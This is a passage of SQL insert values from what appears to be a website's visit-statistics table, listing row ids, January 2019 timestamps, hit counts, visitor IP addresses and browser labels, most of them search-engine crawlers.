6.148.48','other'),(374249,1548014944,1,1,0,0,'54.36.148.152','other'),(374250,1548015182,1,1,0,0,'46.229.168.149','other'),(374251,1548015183,1,1,0,0,'46.229.168.152','other'),(374252,1548015189,1,1,0,0,'54.36.148.224','other'),(374253,1548015203,6,6,0,0,'216.244.66.241','other'),(374254,1548015344,2,2,0,0,'66.249.65.196','chrome'),(374255,1548015418,1,1,0,0,'8.29.198.27','other'),(374256,1548015701,1,1,0,0,'54.36.149.11','other'),(374257,1548015835,1,1,0,0,'54.36.148.144','other'),(374258,1548015967,1,1,0,0,'157.55.39.124','other'),(374259,1548016183,10,10,0,0,'216.244.66.241','other'),(374260,1548016300,1,1,0,0,'54.36.149.84','other'),(374261,1548016369,1,1,0,0,'54.36.149.88','other'),(374262,1548016618,1,1,0,0,'54.36.149.59','other'),(374263,1548017057,1,1,0,0,'54.36.148.80','other'),(374264,1548017067,1,1,0,0,'54.36.149.47','other'),(374265,1548017185,1,1,0,0,'207.46.13.173','other'),(374266,1548017264,1,1,0,0,'35.192.84.7','other'),(374267,1548017301,1,1,0,0,'54.36.148.25','other'),(374268,1548017476,4,4,0,0,'5.45.207.19','other'),(374269,1548017538,2,2,0,0,'5.45.207.79','other'),(374270,1548017596,1,1,0,0,'141.8.142.103','other'),(374271,1548017621,1,1,0,0,'66.249.65.211','chrome'),(374272,1548017622,1,1,0,0,'66.249.65.198','chrome'),(374273,1548017623,1,1,0,0,'54.36.148.124','other'),(374274,1548017625,1,1,0,0,'46.229.168.133','other'),(374275,1548017987,18,18,0,0,'216.244.66.241','other'),(374276,1548018259,1,1,0,0,'54.36.148.241','other'),(374277,1548018552,1,1,0,0,'207.46.13.1','other'),(374278,1548018696,1,1,0,0,'46.229.168.144','other'),(374279,1548018723,1,1,0,0,'178.154.244.11','other'),(374280,1548018820,1,1,0,0,'54.36.149.58','other'),(374281,1548019000,1,1,0,0,'54.36.148.13','other'),(374282,1548019025,1,1,0,0,'93.72.152.236','chrome'),(374283,1548019182,3,3,0,0,'216.244.66.241','other'),(374284,1548019712,1,1,0,0,'54.36.148.130','other'),(374285,1548019893,1,1,0,0,'46.229.168.145','other'),(374286,1548020264,1,1,0,0,'54.36.148.157','other'),(374287,1548020317,1,1,0,0,'54.36.148.165','other'),(374288,1548020436,1,1,0,0,'66.249.65.211','chrome'),(374289,1548020437,1,1,0,0,'66.249.65.194','chrome'),(374290,1548020522,1,1,0,0,'54.36.149.55','other'),(374291,1548020611,1,1,0,0,'54.36.149.40','other'),(374292,1548020612,1,1,0,0,'54.36.149.47','other'),(374293,1548020650,1,1,0,0,'54.36.149.106','other'),(374294,1548020671,1,1,0,0,'54.36.148.17','other'),(374295,1548020689,3,3,0,0,'207.46.13.173','other'),(374296,1548020776,12,12,0,0,'216.244.66.241','other'),(374297,1548020836,1,1,0,0,'54.36.148.188','other'),(374298,1548020998,1,1,0,0,'54.36.148.22','other'),(374299,1548021385,2,2,0,0,'217.69.143.217','firefox'),(374300,1548021433,1,1,0,0,'66.249.65.196','chrome'),(374301,1548021672,1,1,0,0,'54.36.149.4','other'),(374302,1548021711,1,1,0,0,'54.36.149.99','other'),(374303,1548021922,1,1,0,0,'54.36.149.91','other'),(374304,1548022014,3,3,0,0,'216.244.66.241','other'),(374305,1548022061,1,1,0,0,'54.36.148.69','other'),(374306,1548022388,1,1,0,0,'157.55.39.176','other'),(374307,1548022497,1,1,0,0,'46.229.168.135','other'),(374308,1548023328,1,1,0,0,'46.229.168.154','other'),(374309,1548023438,1,1,0,0,'46.229.168.144','other'),(374310,1548023440,1,1,0,0,'46.229.168.140','other'),(374311,1548023657,4,4,0,0,'216.244.66.241','other'),(374312,1548023842,1,1,0,0,'66.249.65.196','chrome'),(374313,1548024273,1,1,0,0,'54.36.148.152','other'),(374314,1548024290,1,1,0,0,'54.36.148.249','other'),(374315,1548024467,1,1,0,0,'54.36.148.70','other'),(374316,1548024588,4,4,0,0,'216.244.66.241','other'),(374317,1548024628,1,1,0,0,'54.36.148.49','other'),(374318,1548024638,1,1,0,0,'8.29.198.26','other'),(374319,1548024734,1,1,0,0,'54.36.148.62','other'),(374320,1548024742,1,1,0,0,'40.77.167.3','other'),(374321,1548024771,1,1,0,0,'54.36.148.169','other'),(374322,1548024873,1,1,0,0,'46.229.168.154','other'),(374323,1548024875,1,1,0,0,'46.229.168.142','other'),(374324,1548024975,1,1,0,0,'54.36.148.228','other'),(374325,1548025230,1,1,0,0,'54.36.148.179','other'),(374326,1548025241,1,1,0,0,'54.36.149.104','other'),(374327,1548025261,1,1,0,0,'37.73.122.141','chrome'),(374328,1548025394,1,1,0,0,'66.249.65.211','chrome'),(374329,1548025399,1,1,0,0,'66.249.65.196','chrome'),(374330,1548025878,1,1,0,0,'54.36.148.99','other'),(374331,1548025996,1,1,0,0,'54.36.148.223','other'),(374332,1548026146,1,1,0,0,'54.36.148.114','other'),(374333,1548026274,1,1,0,0,'8.29.198.27','other'),(374334,1548026319,9,9,0,0,'216.244.66.241','other'),(374335,1548026429,1,1,0,0,'54.36.149.100','other'),(374336,1548026494,1,1,0,0,'157.55.39.176','other'),(374337,1548026706,1,1,0,0,'46.229.168.147','other'),(374338,1548026935,1,1,0,0,'207.46.13.1','other'),(374339,1548027298,1,1,0,0,'54.36.148.109','other'),(374340,1548027432,1,1,0,0,'51.255.65.46','other'),(374341,1548027437,1,1,0,0,'46.229.168.132','other'),(374342,1548027491,1,1,0,0,'54.36.148.23','other'),(374343,1548027578,1,1,0,0,'66.249.65.209','chrome'),(374344,1548027579,1,1,0,0,'66.249.65.194','chrome'),(374345,1548027679,1,1,0,0,'66.249.65.211','chrome'),(374346,1548027680,1,1,0,0,'66.249.65.196','chrome'),(374347,1548027717,1,1,0,0,'54.36.148.218','other'),(374348,1548029107,9,9,0,0,'216.244.66.241','other'),(374349,1548029210,1,1,0,0,'54.36.149.64','other'),(374350,1548029631,2,2,0,0,'46.229.168.137','other'),(374351,1548030013,1,1,0,0,'54.36.148.121','other'),(374352,1548030090,1,1,0,0,'66.249.73.1','chrome'),(374353,1548030272,2,2,0,0,'216.244.66.241','other'),(374354,1548030290,1,1,0,0,'95.108.213.4','other'),(374355,1548030429,1,1,0,0,'46.229.168.145','other'),(374356,1548030439,1,1,0,0,'178.154.171.27','other'),(374357,1548030456,2,2,0,0,'141.8.142.81','other'),(374358,1548030582,1,1,0,0,'95.108.181.54','other'),(374359,1548030697,2,2,0,0,'178.154.171.30','other'),(374360,1548030826,1,1,0,0,'54.36.148.233','other'),(374361,1548030859,1,1,0,0,'66.249.73.29','chrome'),(374362,1548030861,1,1,0,0,'66.249.73.30','chrome'),(374363,1548030905,1,1,0,0,'95.108.181.83','other'),(374364,1548031017,3,3,0,0,'213.180.203.17','other'),(374365,1548031022,1,1,0,0,'54.36.148.249','other'),(374366,1548031198,1,1,0,0,'87.250.224.47','other'),(374367,1548031212,1,1,0,0,'178.154.171.24','other'),(374368,1548031255,1,1,0,0,'141.8.142.38','other'),(374369,1548031278,1,1,0,0,'5.45.207.79','other'),(374370,1548031494,1,1,0,0,'54.36.148.228','other'),(374371,1548031699,1,1,0,0,'54.36.148.29','other'),(374372,1548031760,1,1,0,0,'141.8.183.23','other'),(374373,1548031829,1,1,0,0,'54.36.149.11','other'),(374374,1548031870,9,9,0,0,'216.244.66.241','other'),(374375,1548031914,1,1,0,0,'54.36.149.40','other'),(374376,1548032118,1,1,0,0,'185.220.102.4','other'),(374377,1548032136,1,1,0,0,'40.77.167.41','other'),(374378,1548032422,2,2,0,0,'91.242.162.65','other'),(374379,1548032786,3,3,0,0,'216.244.66.241','other'),(374380,1548032927,1,1,0,0,'66.249.65.213','chrome'),(374381,1548032928,1,1,0,0,'66.249.65.196','chrome'),(374382,1548033081,1,1,0,0,'54.36.148.138','other'),(374383,1548033127,1,1,0,0,'46.229.168.146','other'),(374384,1548033175,2,2,0,0,'5.35.37.50','firefox'),(374385,1548033611,2,2,0,0,'91.242.162.65','other'),(374386,1548033795,1,1,0,0,'54.36.149.14','other'),(374387,1548033876,1,1,0,0,'54.36.148.84','other'),(374388,1548033965,2,2,0,0,'157.55.39.124','other'),(374389,1548034371,2,2,0,0,'207.46.13.155','other'),(374390,1548034605,4,4,0,0,'216.244.66.241','other'),(374391,1548034885,1,1,0,0,'54.36.148.137','other'),(374392,1548034932,1,1,0,0,'54.36.149.91','other'),(374393,1548035365,1,1,0,0,'54.36.148.184','other'),(374394,1548035474,1,1,0,0,'8.29.198.26','other'),(374395,1548035491,1,1,0,0,'54.36.148.139','other'),(374396,1548035544,1,1,0,0,'216.244.66.241','other'),(374397,1548035599,1,1,0,0,'54.36.148.194','other'),(374398,1548035661,1,1,0,0,'54.36.148.76','other'),(374399,1548035810,1,1,0,0,'54.36.148.68','other'),(374400,1548035826,1,1,0,0,'54.36.149.62','other'),(374401,1548035869,1,1,0,0,'54.36.148.217','other'),(374402,1548036232,1,1,0,0,'54.36.149.76','other'),(374403,1548036328,1,1,0,0,'207.46.13.155','other'),(374404,1548036351,1,1,0,0,'180.76.15.149','other'),(374405,1548036353,1,1,0,0,'180.76.15.30','other'),(374406,1548036434,1,1,0,0,'54.36.148.219','other'),(374407,1548036467,2,2,0,0,'40.77.167.191','other'),(374408,1548036519,5,5,0,0,'216.244.66.241','other'),(374409,1548037123,1,1,0,0,'8.29.198.27','other'),(374410,1548037151,1,1,0,0,'54.36.148.157','other'),(374411,1548037164,1,1,0,0,'54.36.148.175','other'),(374412,1548037425,6,6,0,0,'216.244.66.241','other'),(374413,1548037450,1,1,0,0,'54.36.148.108','other'),(374414,1548037596,1,1,0,0,'54.36.148.148','other'),(374415,1548037815,1,1,0,0,'91.242.162.65','other'),(374416,1548038129,1,1,0,0,'54.36.148.186','other'),(374417,1548038154,1,1,0,0,'54.36.149.78','other'),(374418,1548038260,1,1,0,0,'54.36.149.100','other'),(374419,1548038304,1,1,0,0,'54.36.148.156','other'),(374420,1548038345,4,4,0,0,'216.244.66.241','other'),(374421,1548038407,1,1,0,0,'40.77.167.41','other'),(374422,1548038566,1,1,0,0,'54.36.148.199','other'),(374423,1548038783,1,1,0,0,'54.36.148.142','other'),(374424,1548038879,1,1,0,0,'54.36.148.220','other'),(374425,1548039095,1,1,0,0,'54.36.149.48','other'),(374426,1548039291,1,1,0,0,'54.36.149.67','other'),(374427,1548040063,1,1,0,0,'157.55.39.124','other'),(374428,1548040073,8,8,0,0,'216.244.66.241','other'),(374429,1548040098,1,1,0,0,'40.77.167.191','other'),(374430,1548040168,1,1,0,0,'54.36.149.45','other'),(374431,1548040178,1,1,0,0,'54.36.148.27','other'),(374432,1548040343,1,1,0,0,'40.77.167.41','other'),(374433,1548040675,1,1,0,0,'54.36.148.28','other'),(374434,1548040872,1,1,0,0,'54.36.148.162','other'),(374435,1548040888,1,1,0,0,'54.36.148.29','other'),(374436,1548041037,6,6,0,0,'216.244.66.241','other'),(374437,1548041405,1,1,0,0,'207.46.13.155','other'),(374438,1548041456,1,1,0,0,'54.36.148.158','other'),(374439,1548041495,1,1,0,0,'54.36.148.147','other'),(374440,1548041520,1,1,0,0,'157.55.39.124','other'),(374441,1548041774,1,1,0,0,'54.36.148.132','other'),(374442,1548042302,1,1,0,0,'54.36.149.47','other'),(374443,1548042856,8,8,0,0,'216.244.66.241','other'),(374444,1548043015,1,1,0,0,'54.36.148.106','other'),(374445,1548043201,1,1,0,0,'54.36.148.12','other'),(374446,1548043593,2,2,0,0,'176.37.41.31','chrome'),(374447,1548043645,1,1,0,0,'54.36.148.28','other'),(374448,1548043723,1,1,0,0,'5.45.207.79','other'),(374449,1548043730,1,1,0,0,'40.77.167.191','other'),(374450,1548043832,1,1,0,0,'216.244.66.241','other'),(374451,1548043907,1,1,0,0,'54.36.148.50','other'),(374452,1548043931,1,1,0,0,'5.45.207.19','other'),(374453,1548043969,1,1,0,0,'141.8.142.103','other'),(374454,1548044006,1,1,0,0,'54.36.149.48','other'),(374455,1548044621,1,1,0,0,'54.36.149.23','other'),(374456,1548044838,1,1,0,0,'54.36.149.9','other'),(374457,1548044996,1,1,0,0,'54.36.148.70','other'),(374458,1548045317,1,1,0,0,'40.77.167.41','other'),(374459,1548045359,1,1,0,0,'66.249.65.213','chrome'),(374460,1548045360,1,1,0,0,'66.249.65.198','chrome'),(374461,1548045499,1,1,0,0,'54.36.148.138','other'),(374462,1548045538,12,12,0,0,'216.244.66.241','other'),(374463,1548045661,1,1,0,0,'54.36.148.136','other'),(374464,1548045973,1,1,0,0,'54.36.149.29','other'),(374465,1548046023,1,1,0,0,'54.36.148.40','other'),(374466,1548046125,1,1,0,0,'54.36.148.177','other'),(374467,1548046296,1,1,0,0,'8.29.198.25','other'),(374468,1548046322,1,1,0,0,'54.36.148.59','other'),(374469,1548046444,1,1,0,0,'46.229.168.152','other'),(374470,1548046457,5,5,0,0,'216.244.66.241','other'),(374471,1548046908,1,1,0,0,'54.36.148.102','other'),(374472,1548047012,1,1,0,0,'54.36.149.74','other'),(374473,1548047344,1,1,0,0,'66.249.65.194','chrome'),(374474,1548047503,1,1,0,0,'54.36.149.97','other'),(374475,1548047520,3,3,0,0,'216.244.66.241','other'),(374476,1548047619,1,1,0,0,'66.249.65.198','chrome'),(374477,1548047966,1,1,0,0,'8.29.198.25','other'),(374478,1548048369,6,6,0,0,'40.77.167.191','other'),(374479,1548048411,6,6,0,0,'40.77.167.41','other'),(374480,1548048449,1,1,0,0,'54.36.148.35','other'),(374481,1548048455,7,7,0,0,'216.244.66.241','other'),(374482,1548048471,3,3,0,0,'157.55.39.124','other'),(374483,1548048544,1,1,0,0,'51.255.65.46','other'),(374484,1548048583,1,1,0,0,'54.36.149.27','other'),(374485,1548048927,2,2,0,0,'46.229.168.141','other'),(374486,1548048995,1,1,0,0,'66.249.65.213','chrome'),(374487,1548048996,2,2,0,0,'66.249.65.196','chrome'),(374488,1548049044,1,1,0,0,'66.249.65.209','chrome'),(374489,1548049138,1,1,0,0,'54.36.148.50','other'),(374490,1548049377,1,1,0,0,'54.36.148.174','other'),(374491,1548049379,1,1,0,0,'54.36.148.68','other'),(374492,1548049539,1,1,0,0,'54.36.148.29','other'),(374493,1548049563,1,1,0,0,'54.36.148.222','other'),(374494,1548049656,1,1,0,0,'54.36.148.24','other'),(374495,1548049721,1,1,0,0,'40.77.167.191','other'),(374496,1548049740,1,1,0,0,'54.36.148.182','other'),(374497,1548049788,1,1,0,0,'46.229.168.154','other'),(374498,1548049790,1,1,0,0,'46.229.168.148','other'),(374499,1548049931,1,1,0,0,'54.36.148.157','other'),(374500,1548049942,1,1,0,0,'46.229.168.145','other'),(374501,1548049966,1,1,0,0,'54.36.149.31','other'),(374502,1548050116,1,1,0,0,'54.36.148.230','other'),(374503,1548050323,1,1,0,0,'54.36.149.55','other'),(374504,1548050397,1,1,0,0,'54.36.148.83','other'),(374505,1548050413,1,1,0,0,'54.36.148.17','other'),(374506,1548050539,1,1,0,0,'54.36.149.97','other'),(374507,1548050599,1,1,0,0,'54.36.148.28','other'),(374508,1548050644,2,2,0,0,'207.46.13.155','other'),(374509,1548050738,1,1,0,0,'66.249.65.211','chrome'),(374510,1548050742,2,2,0,0,'66.249.65.194','chrome'),(374511,1548050796,1,1,0,0,'66.249.65.213','chrome'),(374512,1548050888,2,2,0,0,'178.17.166.150','other'),(374513,1548051018,9,9,0,0,'216.244.66.241','other'),(374514,1548051074,1,1,0,0,'54.36.148.196','other'),(374515,1548051306,1,1,0,0,'54.36.148.234','other'),(374516,1548051338,1,1,0,0,'54.36.148.188','other'),(374517,1548051457,1,1,0,0,'54.36.148.43','other'),(374518,1548051740,1,1,0,0,'54.36.149.105','other'),(374519,1548051850,1,1,0,0,'54.36.149.14','other'),(374520,1548051971,6,6,0,0,'216.244.66.241','other'),(374521,1548052171,7,7,0,0,'207.46.13.155','other'),(374522,1548052535,1,1,0,0,'207.46.13.115','other'),(374523,1548052710,1,1,0,0,'66.249.65.211','chrome'),(374524,1548052711,1,1,0,0,'66.249.65.196','chrome'),(374525,1548052758,1,1,0,0,'54.36.149.74','other'),(374526,1548052802,1,1,0,0,'195.128.17.206','other'),(374527,1548053202,4,4,0,0,'207.46.13.155','other'),(374528,1548053361,1,1,0,0,'54.36.148.17','other'),(374529,1548053375,2,2,0,0,'91.196.177.46','firefox'),(374530,1548053445,1,1,0,0,'54.36.148.16','other'),(374531,1548053451,1,1,0,0,'157.55.39.124','other'),(374532,1548053677,1,1,0,0,'40.77.167.191','other'),(374533,1548053947,1,1,0,0,'54.36.148.73','other'),(374534,1548053961,1,1,0,0,'46.229.168.133','other'),(374535,1548053997,5,5,0,0,'216.244.66.241','other'),(374536,1548054130,1,1,0,0,'54.36.148.123','other'),(374537,1548054173,1,1,0,0,'54.36.148.100','other'),(374538,1548054225,1,1,0,0,'207.46.13.155','other'),(374539,1548054278,2,2,0,0,'91.196.178.71','firefox'),(374540,1548054661,1,1,0,0,'54.36.148.76','other'),(374541,1548054900,1,1,0,0,'54.36.148.55','other'),(374542,1548054951,1,1,0,0,'54.36.148.46','other'),(374543,1548055157,2,2,0,0,'216.244.66.241','other'),(374544,1548055275,1,1,0,0,'54.36.148.65','other'),(374545,1548055311,1,1,0,0,'54.36.149.43','other'),(374546,1548055494,1,1,0,0,'54.36.149.57','other'),(374547,1548055541,1,1,0,0,'54.36.148.116','other'),(374548,1548055678,1,1,0,0,'54.36.148.211','other'),(374549,1548055815,2,2,0,0,'178.154.244.11','other'),(374550,1548055854,1,1,0,0,'54.36.148.100','other'),(374551,1548055982,1,1,0,0,'54.36.149.93','other'),(374552,1548056144,1,1,0,0,'66.249.65.213','chrome'),(374553,1548056145,1,1,0,0,'66.249.65.198','chrome'),(374554,1548056358,1,1,0,0,'54.36.148.200','other'),(374555,1548056462,6,6,0,0,'216.244.66.241','other'),(374556,1548056650,1,1,0,0,'40.77.169.22','other'),(374557,1548056674,1,1,0,0,'5.45.207.19','other'),(374558,1548056799,2,2,0,0,'91.196.178.93','chrome'),(374559,1548056823,1,1,0,0,'95.108.213.4','other'),(374560,1548056920,2,2,0,0,'37.9.113.103','other'),(374561,1548057126,1,1,0,0,'8.29.198.26','other'),(374562,1548057165,1,1,0,0,'87.250.224.47','other'),(374563,1548057255,2,2,0,0,'178.154.244.11','other'),(374564,1548057375,4,4,0,0,'216.244.66.241','other'),(374565,1548057382,1,1,0,0,'54.36.148.174','other'),(374566,1548057407,1,1,0,0,'54.36.149.11','other'),(374567,1548057415,2,2,0,0,'207.46.13.115','other'),(374568,1548057600,1,1,0,0,'31.184.238.107','chrome'),(374569,1548057668,1,1,0,0,'5.45.207.79','other'),(374570,1548057928,2,2,0,0,'5.45.207.19','other'),(374571,1548057942,3,3,0,0,'91.196.178.93','chrome'),(374572,1548058089,1,1,0,0,'141.8.142.103','other'),(374573,1548058222,1,1,0,0,'54.36.148.113','other'),(374574,1548058422,8,8,0,0,'216.244.66.241','other'),(374575,1548058830,1,1,0,0,'8.29.198.25','other'),(374576,1548059090,1,1,0,0,'54.36.148.216','other'),(374577,1548059303,1,1,0,0,'54.36.148.172','other'),(374578,1548059374,18,18,0,0,'216.244.66.241','other'),(374579,1548059447,1,1,0,0,'66.249.65.196','chrome'),(374580,1548059442,2,2,0,0,'37.53.86.6','chrome'),(374581,1548059644,1,1,0,0,'91.196.177.46','firefox'),(374582,1548059719,1,1,0,0,'66.249.65.194','chrome'),(374583,1548059860,2,2,0,0,'46.229.168.153','other'),(374584,1548060338,1,1,0,0,'54.36.148.200','other'),(374585,1548060685,1,1,0,0,'40.77.167.41','other'),(374586,1548060717,1,1,0,0,'54.36.148.240','other'),(374587,1548060825,1,1,0,0,'46.211.26.138','chrome'),(374588,1548060849,1,1,0,0,'54.36.149.34','other'),(374589,1548060855,1,1,0,0,'54.36.148.41','other'),(374590,1548060905,1,1,0,0,'54.36.149.24','other'),(374591,1548060964,1,1,0,0,'66.249.79.183','chrome'),(374592,1548060967,1,1,0,0,'66.249.65.198','chrome'),(374593,1548061026,1,1,0,0,'66.249.73.30','chrome'),(374594,1548061068,1,1,0,0,'54.36.148.80','other'),(374595,1548061069,1,1,0,0,'95.134.219.215','chrome'),(374596,1548061202,4,4,0,0,'216.244.66.241','other'),(374597,1548061242,2,2,0,0,'91.225.162.28','chrome'),(374598,1548061524,1,1,0,0,'54.36.149.26','other'),(374599,1548061621,1,1,0,0,'54.36.148.79','other'),(374600,1548061797,1,1,0,0,'66.249.73.1','chrome'),(374601,1548061964,1,1,0,0,'54.36.148.172','other'),(374602,1548062037,1,1,0,0,'35.192.84.7','other'),(374603,1548062046,1,1,0,0,'54.36.148.69','other'),(374604,1548062276,4,4,0,0,'91.196.178.100','chrome'),(374605,1548062314,2,2,0,0,'91.196.178.93','chrome'),(374606,1548062320,1,1,0,0,'54.36.149.83','other'),(374607,1548062364,1,1,0,0,'54.36.148.170','other'),(374608,1548062393,1,1,0,0,'40.77.167.41','other'),(374609,1548062461,2,2,0,0,'95.132.23.244','firefox'),(374610,1548062609,2,2,0,0,'157.55.39.124','other'),(374611,1548062621,3,3,0,0,'216.244.66.241','other'),(374612,1548062676,2,2,0,0,'91.237.107.56','chrome'),(374613,1548062781,1,1,0,0,'54.36.148.120','other'),(374614,1548062820,1,1,0,0,'54.36.148.12','other'),(374615,1548062835,1,1,0,0,'178.94.31.221','chrome'),(374616,1548063180,1,1,0,0,'54.36.148.199','other'),(374617,1548063742,1,1,0,0,'54.36.148.134','other'),(374618,1548064031,2,2,0,0,'37.55.59.37','chrome'),(374619,1548064086,1,1,0,0,'91.196.178.71','firefox'),(374620,1548064311,1,1,0,0,'40.77.167.142','other'),(374621,1548064352,1,1,0,0,'46.229.168.145','other'),(374622,1548064354,1,1,0,0,'46.229.168.135','other'),(374623,1548064452,1,1,0,0,'54.36.148.154','other'),(374624,1548064681,13,13,0,0,'216.244.66.241','other'),(374625,1548064694,1,1,0,0,'54.36.148.49','other'),(374626,1548064733,1,1,0,0,'54.36.148.212','other'),(374627,1548064852,1,1,0,0,'54.36.148.153','other'),(374628,1548064865,1,1,0,0,'54.36.148.219','other'),(374629,1548064975,1,1,0,0,'54.36.148.108','other'),(374630,1548065043,1,1,0,0,'54.36.148.176','other'),(374631,1548065207,2,2,0,0,'46.201.184.63','chrome'),(374632,1548065287,1,1,0,0,'54.36.149.23','other'),(374633,1548065301,1,1,0,0,'54.36.149.34','other'),(374634,1548065621,3,3,0,0,'216.244.66.241','other'),(374635,1548065950,1,1,0,0,'54.36.148.229','other'),(374636,1548065966,1,1,0,0,'54.36.149.15','other'),(374637,1548066208,1,1,0,0,'46.229.168.151','other'),(374638,1548066316,1,1,0,0,'54.36.149.92','other'),(374639,1548066450,1,1,0,0,'106.38.241.176','other'),(374640,1548066473,1,1,0,0,'157.55.39.71','other'),(374641,1548066751,1,1,0,0,'54.36.148.75','other'),(374642,1548066756,2,2,0,0,'91.237.107.56','chrome'),(374643,1548066909,1,1,0,0,'66.249.65.196','chrome'),(374644,1548066911,1,1,0,0,'54.36.149.12','other'),(374645,1548067408,9,9,0,0,'216.244.66.241','other'),(374646,1548067827,1,1,0,0,'54.36.149.66','other'),(374647,1548067920,1,1,0,0,'207.46.13.134','other'),(374648,1548067960,1,1,0,0,'8.29.198.27','other'),(374649,1548068103,1,1,0,0,'54.36.148.33','other'),(374650,1548068149,1,1,0,0,'54.36.148.25','other'),(374651,1548068338,1,1,0,0,'66.249.73.30','chrome'),(374652,1548068339,4,4,0,0,'216.244.66.241','other'),(374653,1548068422,1,1,0,0,'54.36.148.141','other'),(374654,1548068502,1,1,0,0,'54.36.148.102','other'),(374655,1548068605,1,1,0,0,'193.160.227.82','firefox'),(374656,1548068793,1,1,0,0,'157.55.39.207','other'),(374657,1548068934,1,1,0,0,'54.36.149.28','other'),(374658,1548068959,1,1,0,0,'54.36.149.21','other'),(374659,1548069091,1,1,0,0,'46.229.168.141','other'),(374661,1548069120,1,1,0,0,'40.77.167.142','other'),(374662,1548069137,1,1,0,0,'54.36.149.73','other'),(374663,1548069284,1,1,0,0,'46.229.168.139','other'),(374664,1548069621,1,1,0,0,'54.36.148.50','other'),(374665,1548069686,1,1,0,0,'8.29.198.26','other'),(374666,1548069700,1,1,0,0,'54.36.148.206','other'),(374667,1548069989,1,1,0,0,'91.225.162.28','chrome'),(374668,1548070079,1,1,0,0,'54.36.148.162','other'),(374669,1548070140,1,1,0,0,'54.36.149.103','other'),(374670,1548070153,9,9,0,0,'216.244.66.241','other'),(374671,1548070289,1,1,0,0,'54.36.148.92','other'),(374672,1548070349,2,2,0,0,'91.209.11.236','other'),(374673,1548070569,1,1,0,0,'46.229.168.135','other'),(374674,1548070753,1,1,0,0,'54.36.148.76','other'),(374675,1548070824,1,1,0,0,'207.46.13.185','other'),(374676,1548070904,1,1,0,0,'54.36.148.38','other'),(374677,1548070920,1,1,0,0,'66.249.65.211','chrome'),(374678,1548070921,1,1,0,0,'66.249.65.196','chrome'),(374679,1548070922,1,1,0,0,'54.36.148.29','other'),(374680,1548071136,1,1,0,0,'87.250.224.64','other'),(374681,1548071193,1,1,0,0,'46.229.168.149','other'),(374682,1548071546,1,1,0,0,'5.45.207.19','other'),(374683,1548071639,1,1,0,0,'46.229.168.139','other'),(374684,1548071993,1,1,0,0,'54.36.148.17','other'),(374685,1548072032,5,5,0,0,'216.244.66.241','other'),(374686,1548072413,2,2,0,0,'207.46.13.185','other'),(374687,1548072624,1,1,0,0,'46.229.168.137','other'),(374688,1548072719,1,1,0,0,'54.36.149.37','other'),(374689,1548073176,1,1,0,0,'54.36.148.192','other'),(374690,1548073196,1,1,0,0,'54.36.148.91','other'),(374691,1548073230,1,1,0,0,'54.36.148.13','other'),(374692,1548073332,2,2,0,0,'130.180.210.9','chrome'),(374693,1548073416,1,1,0,0,'54.36.148.160','other'),(374694,1548073432,5,5,0,0,'216.244.66.241','other'),(374695,1548073686,1,1,0,0,'54.36.148.171','other'),(374696,1548073925,1,1,0,0,'54.36.148.116','other'),(374697,1548073939,1,1,0,0,'54.36.148.185','other'),(374698,1548074049,1,1,0,0,'128.69.239.97','msie'),(374699,1548074051,1,1,0,0,'188.32.120.156','msie'),(374700,1548074412,1,1,0,0,'216.244.66.241','other'),(374701,1548074658,2,2,0,0,'91.196.178.71','chrome'),(374702,1548074827,2,2,0,0,'91.196.178.93','chrome'),(374703,1548075065,1,1,0,0,'54.36.148.95','other'),(374704,1548075177,1,1,0,0,'91.196.178.71','firefox'),(374705,1548075294,1,1,0,0,'54.36.148.63','other'),(374706,1548075300,1,1,0,0,'54.36.148.152','other'),(374707,1548075326,2,2,0,0,'66.249.65.194','chrome'),(374708,1548075395,1,1,0,0,'54.36.149.34','other'),(374709,1548075447,1,1,0,0,'66.249.65.209','chrome'),(374711,1548075463,1,1,0,0,'207.46.13.1','other'),(374712,1548075538,2,2,0,0,'66.249.65.213','chrome'),(374713,1548075590,2,2,0,0,'178.94.31.221','chrome'),(374714,1548075626,9,9,0,0,'216.244.66.241','other'),(374715,1548075701,2,2,0,0,'91.196.177.46','firefox'),(374716,1548075923,1,1,0,0,'54.36.148.212','other'),(374717,1548076061,1,1,0,0,'54.36.149.47','other'),(374718,1548076138,1,1,0,0,'207.46.13.185','other'),(374719,1548076224,1,1,0,0,'54.36.148.225','other'),(374720,1548076295,1,1,0,0,'46.229.168.136','other'),(374721,1548076309,2,2,0,0,'66.249.65.194','chrome'),(374722,1548076437,1,1,0,0,'54.36.148.57','other'),(374723,1548076472,1,1,0,0,'54.36.149.79','other'),(374724,1548076749,1,1,0,0,'54.36.148.240','other'),(374725,1548076833,1,1,0,0,'54.36.148.77','other'),(374726,1548077017,1,1,0,0,'66.249.65.196','chrome'),(374727,1548077038,2,2,0,0,'40.77.167.151','other'),(374728,1548077325,1,1,0,0,'35.192.84.7','other'),(374729,1548077550,1,1,0,0,'54.36.149.28','other'),(374730,1548077655,1,1,0,0,'66.249.73.30','chrome'),(374732,1548077712,1,1,0,0,'46.229.168.144','other'),(374733,1548077913,1,1,0,0,'54.36.148.34','other'),(374734,1548077999,1,1,0,0,'66.249.65.194','chrome'),(374735,1548078128,1,1,0,0,'46.229.168.135','other'),(374736,1548078165,1,1,0,0,'54.36.149.29','other'),(374737,1548078359,1,1,0,0,'91.196.178.71','firefox'),(374738,1548078367,12,12,0,0,'216.244.66.241','other'),(374739,1548078434,2,2,0,0,'37.54.144.60','chrome'),(374740,1548078454,2,2,0,0,'78.111.185.87','chrome'),(374741,1548078579,1,1,0,0,'54.36.148.86','other'),(374742,1548078594,1,1,0,0,'54.36.148.183','other'),(374743,1548078783,1,1,0,0,'8.29.198.25','other'),(374744,1548079170,1,1,0,0,'54.36.149.94','other'),(374745,1548079270,5,5,0,0,'216.244.66.241','other'),(374746,1548079316,1,1,0,0,'178.93.7.96','chrome'),(374747,1548079563,1,1,0,0,'54.36.148.91','other'),(374748,1548079977,1,1,0,0,'54.36.148.224','other'),(374749,1548080131,1,1,0,0,'40.77.167.142','other'),(374750,1548080197,1,1,0,0,'46.229.168.140','other'),(374751,1548080308,2,2,0,0,'52.53.201.78','chrome'),(374752,1548080412,2,2,0,0,'216.244.66.241','other'),(374753,1548080476,1,1,0,0,'178.93.7.96','chrome'),(374754,1548080533,1,1,0,0,'8.29.198.25','other'),(374755,1548080860,1,1,0,0,'54.36.149.70','other'),(374756,1548080873,1,1,0,0,'54.36.148.194','other'),(374757,1548081045,1,1,0,0,'54.36.148.213','other'),(374758,1548081095,1,1,0,0,'54.36.148.82','other'),(374759,1548081266,1,1,0,0,'54.36.149.84','other'),(374760,1548081301,1,1,0,0,'54.36.148.114','other'),(374761,1548081384,2,2,0,0,'216.244.66.241','other'),(374762,1548081760,1,1,0,0,'54.36.149.32